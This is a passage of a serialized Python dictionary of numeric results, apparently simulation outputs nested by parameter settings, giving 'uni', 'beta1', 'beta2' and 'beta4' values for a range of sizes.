0.4863070473264254, 'beta4': [0.03218176626342667, 1.0137839199153011]}, 30: {'uni': 0.3267417047168397, 'beta1': 0.11404304917468981, 'beta2': 0.588828283618436, 'beta4': [0.04423747548783673, 1.0114786486125193]}, 20: {'uni': 0.38420849857792005, 'beta1': 0.193594506472965, 'beta2': 0.6372453314564789, 'beta4': [0.06361050423708928, 1.0091615128119644]}, 10: {'uni': 0.5693675845737495, 'beta1': 0.39041102697990016, 'beta2': 0.7566315490210422, 'beta4': [0.09008771114132266, 1.0069189003128556]}}, 750: {1000: {'uni': 0.015017581623422201, 'beta1': 0.0005229969093151775, 'beta2': 0.2203058886730741, 'beta4': [0.00279784709123115, 1.064456900017356]}, 750: {'uni': 0.016904201481230167, 'beta1': 0.0005338291902363273, 'beta2': 0.19340880740923883, 'beta4': [0.00261926497056331, 1.0579321298839985]}, 500: {'uni': 0.027943172620408567, 'beta1': 0.0015318638527157646, 'beta2': 0.25409206714489535, 'beta4': [0.003575838793613114, 1.0492278279222302]}, 400: {'uni': 0.03118864795904444, 'beta1': 0.0016085289162773252, 'beta2': 0.24158631574832493, 'beta4': [0.004570704595623831, 1.043307593616712]}, 300: {'uni': 0.03939923254929314, 'beta1': 0.002394440069879624, 'beta2': 0.27881013797398596, 'beta4': [0.008032996377590652, 1.0410106273195696]}, 200: {'uni': 0.051906798122560396, 'beta1': 0.006278530092671409, 'beta2': 0.30644670823465214, 'beta4': [0.008433048809803174, 1.0336123797928127]}, 150: {'uni': 0.07326600862954896, 'beta1': 0.008905435316224583, 'beta2': 0.37113421026799154, 'beta4': [0.014546850850626635, 1.0289169977314274]}, 100: {'uni': 0.11189329019372281, 'beta1': 0.019846735456416045, 'beta2': 0.39542365294265347, 'beta4': [0.018208296987618746, 1.025766689306411]}, 75: {'uni': 0.1678484331707909, 'beta1': 0.029574402442326134, 'beta2': 0.42874417776423157, 'beta4': [0.02055972472321407, 1.0234873870502206]}, 50: {'uni': 0.1952271332661482, 'beta1': 0.05132180284455529, 'beta2': 0.5101942514065345, 'beta4': [0.029538584572671573, 1.0205709311816702]}, 30: 
{'uni': 0.29549103341642446, 'beta1': 0.11375382235525358, 'beta2': 0.5774010134797688, 'beta4': [0.043397134001584924, 1.0149572928091315]}, 20: {'uni': 0.369054813439251, 'beta1': 0.18753690050721722, 'beta2': 0.6302442146655091, 'beta4': [0.05905591166068328, 1.0127070855268694]}, 10: {'uni': 0.5705723645153031, 'beta1': 0.33538869001095784, 'beta2': 0.7536693315538421, 'beta4': [0.09090966706285687, 1.0096300679209578]}}, 500: {1000: {'uni': 0.021889557244944267, 'beta1': 0.0016084377298841322, 'beta2': 0.22093243033409488, 'beta4': [0.0044242546343159885, 1.0942706517572218]}, 750: {'uni': 0.0282779819663743, 'beta1': 0.0010063238278199597, 'beta2': 0.22801622968391058, 'beta4': [0.003524960547103637, 1.0847550545283853]}, 500: {'uni': 0.02396940909943071, 'beta1': 0.0012467850959314592, 'beta2': 0.2403896865764518, 'beta4': [0.004622510648582559, 1.078998095038962]}, 400: {'uni': 0.029529299989594714, 'beta1': 0.0012555606744509623, 'beta2': 0.26866034442080555, 'beta4': [0.004369392231828045, 1.0635484692436274]}, 300: {'uni': 0.03991254665867394, 'beta1': 0.00255822522826619, 'beta2': 0.2642231017828307, 'beta4': [0.005987976762930624, 1.0603589784153802]}, 200: {'uni': 0.06061810982823111, 'beta1': 0.004931950447678618, 'beta2': 0.3192877286208291, 'beta4': [0.00779126287388132, 1.047823237900618]}, 150: {'uni': 0.08309549670478669, 'beta1': 0.00964244354795674, 'beta2': 0.34286215766481964, 'beta4': [0.01441652340985287, 1.0466346852282493]}, 100: {'uni': 0.10587341186654257, 'beta1': 0.01978694887441401, 'beta2': 0.39279220465296005, 'beta4': [0.018506230081135853, 1.0370421759695896]}, 75: {'uni': 0.13396967983613503, 'beta1': 0.028619271263970607, 'beta2': 0.4432603614897364, 'beta4': [0.027804200013461133, 1.0299777798090028]}, 50: {'uni': 0.21077312314667257, 'beta1': 0.05886988860232499, 'beta2': 0.46155116123085194, 'beta4': [0.03078387179932803, 1.0289576178335533]}, 30: {'uni': 0.3131438067304429, 'beta1': 0.11687966328016658, 'beta2': 
0.5663680930743225, 'beta4': [0.04808898498893729, 1.0239674123992182]}, 20: {'uni': 0.3569885336276907, 'beta1': 0.1869604203182388, 'beta2': 0.5988532407417108, 'beta4': [0.05835834115870568, 1.0204858684172466]}, 10: {'uni': 0.5803490099111785, 'beta1': 0.36069945606514914, 'beta2': 0.7395010191228991, 'beta4': [0.08620087384471821, 1.013087530204457]}}, 400: {1000: {'uni': 0.026575918392955672, 'beta1': 0.002392815941304911, 'beta2': 0.24456541440243038, 'beta4': [0.004797919837938112, 1.1253811146360175]}, 750: {'uni': 0.02644965057420995, 'beta1': 0.002199022745448091, 'beta2': 0.24959821674028976, 'beta4': [0.004905034300258548, 1.104013219668593]}, 500: {'uni': 0.02959411665644158, 'beta1': 0.0016885572723923717, 'beta2': 0.24898911593101478, 'beta4': [0.004745438922447355, 1.088997665442233]}, 400: {'uni': 0.03502641320504352, 'beta1': 0.0016786943439029485, 'beta2': 0.2621921403404168, 'beta4': [0.004346224166041328, 1.0878846972621905]}, 300: {'uni': 0.04520325219647054, 'beta1': 0.0025501491440857887, 'beta2': 0.28592593421863094, 'beta4': [0.005324036219642212, 1.0691502375303021]}, 200: {'uni': 0.060109075263989446, 'beta1': 0.0052223884602183, 'beta2': 0.3125300226275192, 'beta4': [0.009280681826497663, 1.061558045261655]}, 150: {'uni': 0.07576829707995025, 'beta1': 0.007564903489288599, 'beta2': 0.3427799333015165, 'beta4': [0.011798396618607104, 1.0571740473117883]}, 100: {'uni': 0.11065680954182613, 'beta1': 0.01869098098454615, 'beta2': 0.4074253856786578, 'beta4': [0.015345065823318946, 1.0495661343336482]}, 75: {'uni': 0.12655190907350036, 'beta1': 0.03233447613785924, 'beta2': 0.4488100553399162, 'beta4': [0.024128531781180237, 1.0457037327331788]}, 50: {'uni': 0.17398297564543322, 'beta1': 0.05681149532603595, 'beta2': 0.4627537389486546, 'beta4': [0.030088173703089676, 1.036191980100532]}, 30: {'uni': 0.2783538553040459, 'beta1': 0.11152420121298304, 'beta2': 0.5659592579757353, 'beta4': [0.044256366871811184, 1.032758713111244]}, 20: 
{'uni': 0.40117304365295786, 'beta1': 0.2243708212441248, 'beta2': 0.6328241267767309, 'beta4': [0.05549991056298481, 1.0242052145141003]}, 10: {'uni': 0.5663957187651154, 'beta1': 0.367708243523239, 'beta2': 0.7561886475209632, 'beta4': [0.08503946611358437, 1.018904469921347]}}, 300: {1000: {'uni': 0.044566279105790474, 'beta1': 0.003327100530729034, 'beta2': 0.24078148356606432, 'beta4': [0.007288512460233923, 1.1407560034413293]}, 750: {'uni': 0.04277094007544684, 'beta1': 0.0021792994032752817, 'beta2': 0.3059000327593824, 'beta4': [0.006180875297249271, 1.1416369645421611]}, 500: {'uni': 0.035686740283980896, 'beta1': 0.0031967310027901977, 'beta2': 0.26516243628185904, 'beta4': [0.006373897578729658, 1.118051730471194]}, 400: {'uni': 0.03962556425612263, 'beta1': 0.00302236885935727, 'beta2': 0.28268247076294517, 'beta4': [0.006505476273152509, 1.1195062441426369]}, 300: {'uni': 0.03952239211713717, 'beta1': 0.002251421100688415, 'beta2': 0.2925527201127294, 'beta4': [0.00627083227986432, 1.0947897660301564]}, 200: {'uni': 0.05376346846673587, 'beta1': 0.0056129209261833535, 'beta2': 0.3045540431166837, 'beta4': [0.008073612074167416, 1.0780367857898463]}, 150: {'uni': 0.06707689863621345, 'beta1': 0.011476123926329301, 'beta2': 0.32317902238154983, 'beta4': [0.010910287838315519, 1.0784206140124115]}, 100: {'uni': 0.11377796787499908, 'beta1': 0.017237766709165093, 'beta2': 0.39768431902260115, 'beta4': [0.017631802606458878, 1.0682337278229384]}, 75: {'uni': 0.13894361913665587, 'beta1': 0.034186434799691474, 'beta2': 0.42306830656659034, 'beta4': [0.020660954120022272, 1.055028950778487]}, 50: {'uni': 0.24645011563196215, 'beta1': 0.060091771835968005, 'beta2': 0.4754042570886038, 'beta4': [0.029688920539531042, 1.0479568249986413]}, 30: {'uni': 0.28440873282543555, 'beta1': 0.109482940639056, 'beta2': 0.549994604048401, 'beta4': [0.04505001011774477, 1.037756617970666]}, 20: {'uni': 0.3850513892674541, 'beta1': 0.18201980352057348, 'beta2': 
0.60256622468304, 'beta4': [0.06367752118379469, 1.0351258834952837]}, 10: {'uni': 0.5628533038813214, 'beta1': 0.3407017594138133, 'beta2': 0.7477263579938394, 'beta4': [0.09592116572544965, 1.022312456228958]}}, 200: {1000: {'uni': 0.051601596152469564, 'beta1': 0.006491242570563972, 'beta2': 0.3164865095370956, 'beta4': [0.008515436068305947, 1.2250561343578927]}, 750: {'uni': 0.05613472283253878, 'beta1': 0.006185240425682315, 'beta2': 0.3200056117230271, 'beta4': [0.009431110687418993, 1.1808048095372374]}, 500: {'uni': 0.05414951218228231, 'beta1': 0.005424286099782189, 'beta2': 0.2896123389973014, 'beta4': [0.008729410861757693, 1.156445325855722]}, 400: {'uni': 0.059769732308283904, 'beta1': 0.007709482270162348, 'beta2': 0.3211568642021472, 'beta4': [0.00943841263293194, 1.1436174420814718]}, 300: {'uni': 0.0671236882849256, 'beta1': 0.013165057157040751, 'beta2': 0.3074804572409215, 'beta4': [0.008674766530753029, 1.1551805439752956]}, 200: {'uni': 0.05940380948969049, 'beta1': 0.008940837305905933, 'beta2': 0.3068678000469144, 'beta4': [0.008468628870642946, 1.1144914248339726]}, 150: {'uni': 0.07051256848164812, 'beta1': 0.01231387540113938, 'beta2': 0.3734112375168418, 'beta4': [0.011635530187338912, 1.1102344418624115]}, 100: {'uni': 0.1282684380789726, 'beta1': 0.016640339898161893, 'beta2': 0.39116647758434087, 'beta4': [0.017474878824371418, 1.0990514429552851]}, 75: {'uni': 0.1388309766758086, 'beta1': 0.025448616151534417, 'beta2': 0.45250946908108447, 'beta4': [0.023311701330211987, 1.083242075394765]}, 50: {'uni': 0.17657749869850825, 'beta1': 0.06590868264165664, 'beta2': 0.48642256198348116, 'beta4': [0.028818054716693024, 1.0722919065661418]}, 30: {'uni': 0.32013439830903245, 'beta1': 0.11118974873831032, 'beta2': 0.5613232063927698, 'beta4': [0.04081080838254353, 1.0552597162547668]}, 20: {'uni': 0.38424963752626534, 'beta1': 0.17660282729028604, 'beta2': 0.593322847020505, 'beta4': [0.05494264637722776, 1.0459229007658148]}, 10: {'uni': 
0.5184288204086329, 'beta1': 0.38782813410673844, 'beta2': 0.7328305414558911, 'beta4': [0.08660308646383802, 1.0377583841616613]}}, 150: {1000: {'uni': 0.06880107878218425, 'beta1': 0.009598485908326378, 'beta2': 0.3197001858692086, 'beta4': [0.0115533026707448, 1.2515620374494822]}, 750: {'uni': 0.0671538349318563, 'beta1': 0.014647157229541262, 'beta2': 0.375933792122322, 'beta4': [0.014940923590390768, 1.2659371027967505]}, 500: {'uni': 0.07579941138021336, 'beta1': 0.013754198701614238, 'beta2': 0.39570733064249597, 'beta4': [0.014561840496955112, 1.2086766334984447]}, 400: {'uni': 0.0847281819234035, 'beta1': 0.008910478557270205, 'beta2': 0.3666666885993351, 'beta4': [0.012852767161018493, 1.2068807776896686]}, 300: {'uni': 0.08275727613852064, 'beta1': 0.009015687407474727, 'beta2': 0.3471630079992819, 'beta4': [0.012103178530792815, 1.1972581680617507]}, 200: {'uni': 0.0699359902862645, 'beta1': 0.009384943893264627, 'beta2': 0.3269694126933192, 'beta4': [0.011187014417355612, 1.1810564835980994]}, 150: {'uni': 0.08068630534099007, 'beta1': 0.013117986655350801, 'beta2': 0.3822122264853986, 'beta4': [0.013664905276287356, 1.1479655026499307]}, 100: {'uni': 0.10274077669371745, 'beta1': 0.02514437513488057, 'beta2': 0.38582280171054567, 'beta4': [0.015032971481420694, 1.1365471408564738]}, 75: {'uni': 0.1348170016638727, 'beta1': 0.03443745035471468, 'beta2': 0.4157108199307209, 'beta4': [0.01875505481793789, 1.1127844118652421]}, 50: {'uni': 0.19293945781097221, 'beta1': 0.054828889323951385, 'beta2': 0.433458306476045, 'beta4': [0.03510746977521885, 1.0896411928401573]}, 30: {'uni': 0.2898196959850388, 'beta1': 0.11828649409279716, 'beta2': 0.519891016190952, 'beta4': [0.04140751936809961, 1.0735803416018648]}, 20: {'uni': 0.3761111120943085, 'beta1': 0.1860423597466752, 'beta2': 0.6015283358377184, 'beta4': [0.05855148221335893, 1.069790984842932]}, 10: {'uni': 0.5740144616695647, 'beta1': 0.3906152950549322, 'beta2': 0.743599714948697, 'beta4': 
[0.08689760856128591, 1.050307480515673]}}, 100: {1000: {'uni': 0.10099521848726027, 'beta1': 0.026645236836375326, 'beta2': 0.4561009377668412, 'beta4': [0.021664452129982456, 1.392173473496957]}, 750: {'uni': 0.1129539961558924, 'beta1': 0.0213008367839638, 'beta2': 0.5636820614328856, 'beta4': [0.025867002400168083, 1.3748477673872852]}, 500: {'uni': 0.13246151241247883, 'beta1': 0.017762693718526533, 'beta2': 0.4066575501194243, 'beta4': [0.02093940465927965, 1.379384860789293]}, 400: {'uni': 0.11017063968512505, 'beta1': 0.023890314699091485, 'beta2': 0.3877834593983558, 'beta4': [0.019903776791393917, 1.3299478081944538]}, 300: {'uni': 0.16846581725687973, 'beta1': 0.021247654758048126, 'beta2': 0.3876626946907388, 'beta4': [0.017170755289126795, 1.3070608648942346]}, 200: {'uni': 0.11450225522323053, 'beta1': 0.03447492619969185, 'beta2': 0.43616025388644963, 'beta4': [0.019008447347663, 1.2556973492967485]}, 150: {'uni': 0.13539117909597762, 'beta1': 0.020847767798978102, 'beta2': 0.5426589645895388, 'beta4': [0.02008844669853126, 1.212436060212826]}, 100: {'uni': 0.12395958532813696, 'beta1': 0.026023867138296748, 'beta2': 0.41567054621152966, 'beta4': [0.016312695398788834, 1.1934267130464744]}, 75: {'uni': 0.14958491655531964, 'beta1': 0.031328587828317545, 'beta2': 0.43539171455677583, 'beta4': [0.024389470944773287, 1.18591210476864]}, 50: {'uni': 0.20866608846080864, 'beta1': 0.0738343960442376, 'beta2': 0.46150269335210786, 'beta4': [0.03578478824558125, 1.1375845053243308]}, 30: {'uni': 0.2765100135009761, 'beta1': 0.10827097512399869, 'beta2': 0.5373945228642734, 'beta4': [0.04369745106389154, 1.127526956638849]}, 20: {'uni': 0.3823407507282141, 'beta1': 0.1999235052735679, 'beta2': 0.6038440766159979, 'beta4': [0.05885220974852782, 1.1023317863265667]}, 10: {'uni': 0.5298206414110227, 'beta1': 0.35708844112316296, 'beta2': 0.7239655162112311, 'beta4': [0.09086303269946881, 1.0771590457606335]}}, 75: {1000: {'uni': 0.16101820508997058, 'beta1': 
0.0392663030910949, 'beta2': 0.5955010581399385, 'beta4': [0.028166682841671876, 1.4850878870706135]}, 750: {'uni': 0.13400430917278547, 'beta1': 0.05186636043863356, 'beta2': 0.47891299647806207, 'beta4': [0.023805416421474473, 1.5109324828309596]}, 500: {'uni': 0.15033015022241447, 'beta1': 0.03498316710360079, 'beta2': 0.5770284290238726, 'beta4': [0.023372147158943823, 1.4093787391715362]}, 400: {'uni': 0.1531914829080008, 'beta1': 0.03781775380753009, 'beta2': 0.48308220257966694, 'beta4': [0.026036202653387366, 1.3894387213434034]}, 300: {'uni': 0.140096050494891, 'beta1': 0.047058302826873004, 'beta2': 0.48763956543855647, 'beta4': [0.025154254231467974, 1.3428703157935498]}, 200: {'uni': 0.1695800443031254, 'beta1': 0.03248996820371958, 'beta2': 0.4993172041736475, 'beta4': [0.02447051797136617, 1.3717654226221188]}, 150: {'uni': 0.1746878943796265, 'beta1': 0.03620855583816983, 'beta2': 0.43462449526898567, 'beta4': [0.027158912702479637, 1.287118609178937]}, 100: {'uni': 0.17674936395333152, 'beta1': 0.04584363097014311, 'beta2': 0.5011652752537196, 'beta4': [0.023203397617561898, 1.281352064318893]}, 75: {'uni': 0.16666336190194875, 'beta1': 0.043759999233142555, 'beta2': 0.5854013951049823, 'beta4': [0.025734039291296158, 1.2513099214564491]}, 50: {'uni': 0.19778123745684092, 'beta1': 0.05857582115085566, 'beta2': 0.6491458878476999, 'beta4': [0.027734464855309886, 1.2186804525897197]}, 30: {'uni': 0.2908349398537664, 'beta1': 0.12303564804929479, 'beta2': 0.6579127634146081, 'beta4': [0.03925267307683, 1.1786830486510413]}, 20: {'uni': 0.3870059702226258, 'beta1': 0.1638510250315426, 'beta2': 0.6204378214586946, 'beta4': [0.06209409909141029, 1.1517104578692603]}, 10: {'uni': 0.5355522101172704, 'beta1': 0.35408050675108815, 'beta2': 0.7285108013888837, 'beta4': [0.08430842704984991, 1.097394751106502]}}, 50: {1000: {'uni': 0.22424609164297443, 'beta1': 0.10025843798909305, 'beta2': 0.6109226727203947, 'beta4': [0.03924165854902822, 
1.6267421226716416]}, 750: {'uni': 0.2537903023335899, 'beta1': 0.07416880769129822, 'beta2': 0.5080375269871897, 'beta4': [0.03314676909701872, 1.5589018573309383]}, 500: {'uni': 0.23308360263225839, 'beta1': 0.09163661437479734, 'beta2': 0.5477035534119664, 'beta4': [0.034651811631448516, 1.4984262997193514]}, 400: {'uni': 0.2135555660715244, 'beta1': 0.10738424676399555, 'beta2': 0.7301181390917937, 'beta4': [0.044360696665479454, 1.5793090007440191]}, 300: {'uni': 0.20845412309578348, 'beta1': 0.07774222049722822, 'beta2': 0.5953760006140618, 'beta4': [0.03279491280419391, 1.627027852109703]}, 200: {'uni': 0.24319321692664747, 'beta1': 0.13124268707554892, 'beta2': 0.6370589117638976, 'beta4': [0.03790435948557217, 1.4455538593119952]}, 150: {'uni': 0.2376511481632187, 'beta1': 0.07273309414631492, 'beta2': 0.544820369601891, 'beta4': [0.05862998404005149, 1.4572932486873187]}, 100: {'uni': 0.29513109730105114, 'beta1': 0.08860359124141814, 'beta2': 0.5285161783868962, 'beta4': [0.038192643880053403, 1.3806124902781127]}, 75: {'uni': 0.2749288556572405, 'beta1': 0.13174377627922593, 'beta2': 0.7017994016865113, 'beta4': [0.03527787509171762, 1.372290745982181]}, 50: {'uni': 0.2543344897457348, 'beta1': 0.09211055678263366, 'beta2': 0.7093382651151694, 'beta4': [0.036485429499135996, 1.2745825598839697]}, 30: {'uni': 0.2927948306959651, 'beta1': 0.13810074460874613, 'beta2': 0.6809517549251869, 'beta4': [0.03995430405381426, 1.2517503144067612]}, 20: {'uni': 0.37086983572719695, 'beta1': 0.19185529125873838, 'beta2': 0.6183400380730043, 'beta4': [0.056908678575848075, 1.201276519869532]}, 10: {'uni': 0.5357005611311981, 'beta1': 0.3557142999459758, 'beta2': 0.7117358313845611, 'beta4': [0.08832001083612763, 1.1772531157292991]}}, 30: {1000: {'uni': 0.5375517058914333, 'beta1': 0.18682553850708347, 'beta2': 0.9623725671332998, 'beta4': [0.05111006116199637, 2.1284403063269264]}, 750: {'uni': 0.3577356511491193, 'beta1': 0.2793514883989638, 'beta2': 
1.0975406538160377, 'beta4': [0.07097824896206201, 1.9871758843512004]}, 500: {'uni': 0.702141698978866, 'beta1': 0.26555631462924306, 'beta2': 0.9740832893485976, 'beta4': [0.05511187550828117, 1.9841038060295242]}, 400: {'uni': 0.5145446263289309, 'beta1': 0.25794540644995834, 'beta2': 0.828981279891515, 'beta4': [0.06082742626722804, 1.9147202001621995]}, 300: {'uni': 0.4711936487014286, 'beta1': 0.1868542186385208, 'beta2': 0.833463071793256, 'beta4': [0.06651105115357443, 1.97384106365458]}, 200: {'uni': 0.4663956914615083, 'beta1': 0.35256215108473493, 'beta2': 0.8182432862218997, 'beta4': [0.06304111167477797, 1.844645269837164]}, 150: {'uni': 0.433320385683165, 'beta1': 0.2102749321540168, 'beta2': 0.8212444381853243, 'beta4': [0.06040506583522945, 1.7983824565568507]}, 100: {'uni': 0.3812474998448387, 'beta1': 0.22786614409158085, 'beta2': 0.9538255457719403, 'beta4': [0.06026497731561029, 1.7234749363367283]}, 75: {'uni': 0.40094360554599134, 'beta1': 0.23875103233048597, 'beta2': 0.7715118646556511, 'beta4': [0.062243334302248675, 1.6706938143747165]}, 50: {'uni': 0.5023984324782755, 'beta1': 0.21032346823013254, 'beta2': 0.8476224401417406, 'beta4': [0.05376929125174212, 1.5076303475283628]}, 30: {'uni': 0.5022316018535551, 'beta1': 0.19211174291043182, 'beta2': 0.9852383031978549, 'beta4': [0.055882813612441865, 1.5053037754614005]}, 20: {'uni': 0.42257652007685287, 'beta1': 0.2648788987026799, 'beta2': 1.0097366578988298, 'beta4': [0.05212870119742689, 1.3587734455424478]}, 10: {'uni': 0.5752945517368767, 'beta1': 0.3824332965187248, 'beta2': 1.1642452986239304, 'beta4': [0.09422116258863913, 1.2546417636878537]}}, 20: {1000: {'uni': 0.8245658279493084, 'beta1': 0.6714293037543387, 'beta2': 1.1403508046288549, 'beta4': [0.08965514010313543, 2.355993522309204]}, 750: {'uni': 0.7522973791112813, 'beta1': 0.5001791028253899, 'beta2': 1.9167065498955769, 'beta4': [0.08700394872889188, 2.606628099310203]}, 500: {'uni': 0.6830218938900532, 'beta1': 
0.5669378077763796, 'beta2': 1.3620749239695735, 'beta4': [0.09055668995699578, 2.324014882888129]}, 400: {'uni': 0.6717027010335322, 'beta1': 0.5881516513277326, 'beta2': 1.2381092252485557, 'beta4': [0.08982533008390195, 2.871104248026336]}, 300: {'uni': 0.7200071531914536, 'beta1': 0.5639971175195339, 'beta2': 1.2954861108358184, 'beta4': [0.10664037978442996, 2.513620523930525]}, 200: {'uni': 0.5904276032048987, 'beta1': 0.4988005660867027, 'beta2': 1.0996965576942577, 'beta4': [0.07945828546825576, 2.403024638109359]}, 150: {'uni': 0.6221222720189126, 'beta1': 0.594144837149773, 'beta2': 1.1617999336669014, 'beta4': [0.1009825524269249, 2.206361430979434]}, 100: {'uni': 0.6143584688855093, 'beta1': 0.5096177815955042, 'beta2': 1.2546626538685803, 'beta4': [0.08413959400017983, 2.0981666855413628]}, 75: {'uni': 0.8785772478481102, 'beta1': 0.437936732164422, 'beta2': 1.2111561571681346, 'beta4': [0.09396307393791267, 2.359982618370008]}, 50: {'uni': 0.7025752082031005, 'beta1': 0.7186578378289812, 'beta2': 1.2601942541642712, 'beta4': [0.10511632552075476, 1.9884553426902782]}, 30: {'uni': 0.5810201916470588, 'beta1': 0.5995612994384831, 'beta2': 1.4948812858640488, 'beta4': [0.10689852453889333, 1.718598639290735]}, 20: {'uni': 0.6559192165274909, 'beta1': 0.6258327950669433, 'beta2': 1.3153066332074126, 'beta4': [0.08394879019729243, 1.73085600993384]}, 10: {'uni': 0.7114215669900594, 'beta1': 0.5110631063073926, 'beta2': 1.1962015407227755, 'beta4': [0.09298919262453555, 1.540883640483407]}}, 10: {1000: {'uni': 1.9583677469218963, 'beta1': 2.576333617343919, 'beta2': 2.461211967994449, 'beta4': [0.19243838699722618, 3.779369929492513]}, 750: {'uni': 1.938215880657949, 'beta1': 5.391824254480648, 'beta2': 2.6331851083484, 'beta4': [0.21832884837162334, 5.159307970428041]}, 500: {'uni': 2.085024738289965, 'beta1': 3.5133109540444565, 'beta2': 2.382220369676619, 'beta4': [0.16933641621151063, 4.311941729154879]}, 400: {'uni': 2.3249797168528294, 'beta1': 
2.0137087338200947, 'beta2': 6.012764801850701, 'beta4': [0.17567403680412053, 3.5548840861243423]}, 300: {'uni': 3.3198326153076034, 'beta1': 2.4070810291499973, 'beta2': 3.717530102940286, 'beta4': [0.19086555116543857, 3.349825429053164]}, 200: {'uni': 2.0254293672943193, 'beta1': 2.299309830454076, 'beta2': 2.7160076476196853, 'beta4': [0.20201006223755733, 5.303158103378205]}, 150: {'uni': 3.282500960658318, 'beta1': 2.1207065638469773, 'beta2': 1.9410779695397329, 'beta4': [0.14779914391992724, 4.172672748245124]}, 100: {'uni': 1.7067606545068066, 'beta1': 2.6790345925314645, 'beta2': 2.642466168596247, 'beta4': [0.17375693292954014, 3.7555270616484635]}, 75: {'uni': 2.1111537004767342, 'beta1': 2.1926293662494176, 'beta2': 2.644392554644403, 'beta4': [0.16479647222509328, 4.265566144423463]}, 50: {'uni': 2.4816574374593925, 'beta1': 3.225545355279228, 'beta2': 2.427281968416075, 'beta4': [0.21343736012593248, 3.8444544657885107]}, 30: {'uni': 3.1974645398096033, 'beta1': 2.009092390657058, 'beta2': 3.3306193769470287, 'beta4': [0.18325118281932046, 3.195752438854362]}, 20: {'uni': 2.311115457162956, 'beta1': 2.438462691037925, 'beta2': 2.317809029574652, 'beta4': [0.1619449311199175, 2.72060854124639]}, 10: {'uni': 1.860495572909103, 'beta1': 2.4763788602224275, 'beta2': 2.7556546342359924, 'beta4': [0.16743973925875363, 3.272261832564597]}}}, 0.3: {1000: {1000: {'uni': 0.012795174678120393, 'beta1': 0.0002679565864041922, 'beta2': 0.18742635617723044, 'beta4': [0.0017826444891534108, 1.0522042104131124]}, 750: {'uni': 0.018336935363620903, 'beta1': 0.0004754746110374862, 'beta2': 0.18408175297923784, 'beta4': [0.002563961983437563, 1.043912703454493]}, 500: {'uni': 0.023414907512510984, 'beta1': 0.0008285030084488381, 'beta2': 0.21392690782659204, 'beta4': [0.0033738177625835283, 1.0394032441990042]}, 400: {'uni': 0.03177120193768, 'beta1': 0.0019733869982122105, 'beta2': 0.2467648002510673, 'beta4': [0.004811261032941804, 1.033240580519976]}, 300: {'uni': 
0.03815290820877515, 'beta1': 0.002748482329194836, 'beta2': 0.2727747044827896, 'beta4': [0.007856020418320583, 1.0290961116997555]}, 200: {'uni': 0.08507691017511126, 'beta1': 0.004948573058538693, 'beta2': 0.3011091377193825, 'beta4': [0.009638805999161303, 1.0242636316798672]}, 150: {'uni': 0.07472797369113161, 'beta1': 0.01904392003417618, 'beta2': 0.337378405759772, 'beta4': [0.010533899245420439, 1.0217123696885337]}, 100: {'uni': 0.11077744339928126, 'beta1': 0.01920778151803272, 'beta2': 0.40483316774024947, 'beta4': [0.01789711695444819, 1.018186238923615]}, 75: {'uni': 0.11990949678305865, 'beta1': 0.029631460430197737, 'beta2': 0.4499087467731683, 'beta4': [0.028082405545207613, 1.0150370158274151]}, 50: {'uni': 0.19372523646892206, 'beta1': 0.06105398151552832, 'beta2': 0.49624656830731617, 'beta4': [0.03241573448860706, 1.0149051848586808]}, 30: {'uni': 0.28264799923765627, 'beta1': 0.10436396811276909, 'beta2': 0.5513000690922769, 'beta4': [0.043785922945529736, 1.0104075965139894]}, 20: {'uni': 0.35244841088708184, 'beta1': 0.15811742222657982, 'beta2': 0.6484490905373989, 'beta4': [0.053071394096319016, 1.0091627612927796]}, 10: {'uni': 0.5663818741625132, 'beta1': 0.32324795092972336, 'beta2': 0.7377822567041101, 'beta4': [0.08935636518216408, 1.007346648489344]}}, 750: {1000: {'uni': 0.014485201643862624, 'beta1': 0.0006629138723885677, 'beta2': 0.19299740873601873, 'beta4': [0.0029912098349708974, 1.0635084767551528]}, 750: {'uni': 0.016020228660910164, 'beta1': 0.00044792258619544436, 'beta2': 0.20362324734215456, 'beta4': [0.0028190004783775315, 1.0553314938332476]}, 500: {'uni': 0.019975736604073733, 'beta1': 0.0009383156184602303, 'beta2': 0.21272444569670917, 'beta4': [0.00389143518085255, 1.0465923539174913]}, 400: {'uni': 0.031365488090823956, 'beta1': 0.0020041954646797533, 'beta2': 0.22929318942136415, 'beta4': [0.004484087249726235, 1.0438364985477657]}, 300: {'uni': 0.04640849666921278, 'beta1': 0.0024450870414352735, 'beta2': 
0.27450264141297454, 'beta4': [0.006205938298724309, 1.0385476373907243]}, 200: {'uni': 0.06093139793221171, 'beta1': 0.005970997391722452, 'beta2': 0.30214900952475965, 'beta4': [0.009566235751639111, 1.031822806243974]}, 150: {'uni': 0.07407127426735613, 'beta1': 0.011762584862298439, 'beta2': 0.34520256227724017, 'beta4': [0.013083866983431237, 1.0276022904521596]}, 100: {'uni': 0.1049528175541805, 'beta1': 0.02650540954490502, 'beta2': 0.3999251150350931, 'beta4': [0.01622328062265029, 1.029934149910967]}, 75: {'uni': 0.13773478941322262, 'beta1': 0.030231711864218847, 'beta2': 0.4443294917949243, 'beta4': [0.020382021855895858, 1.0225043552068545]}, 50: {'uni': 0.18860277419001642, 'beta1': 0.048683316697604964, 'beta2': 0.5017857392818516, 'beta4': [0.030640384132032683, 1.0175511796414718]}, 30: {'uni': 0.274229496564352, 'beta1': 0.10553107700842067, 'beta2': 0.6047299624940808, 'beta4': [0.04159495872030207, 1.013590583317765]}, 20: {'uni': 0.3311173740302474, 'beta1': 0.18025665597220492, 'beta2': 0.6559673224772654, 'beta4': [0.05677363500512058, 1.0111469897526215]}, 10: {'uni': 0.5503083494942063, 'beta1': 0.3378803618674342, 'beta2': 0.7382975365394384, 'beta4': [0.08012641482289543, 1.007993647568211]}}, 500: {1000: {'uni': 0.020087175565086567, 'beta1': 0.0013935125324983928, 'beta2': 0.21141747412315226, 'beta4': [0.0032526585097433225, 1.0923841201536304]}, 750: {'uni': 0.023119803219004583, 'beta1': 0.0014919615457760513, 'beta2': 0.2215561352923942, 'beta4': [0.0036458796217003326, 1.083706733679476]}, 500: {'uni': 0.02634673909588432, 'beta1': 0.0012884012398439958, 'beta2': 0.22853225772196686, 'beta4': [0.0038840363233813725, 1.070851191946351]}, 400: {'uni': 0.027863611247881087, 'beta1': 0.0019548832749742423, 'beta2': 0.2660337820317211, 'beta4': [0.006843790543473078, 1.0660486796885624]}, 300: {'uni': 0.04195199023609443, 'beta1': 0.005604419821151305, 'beta2': 0.2673400467917025, 'beta4': [0.005845307042980669, 1.0610970046028447]}, 
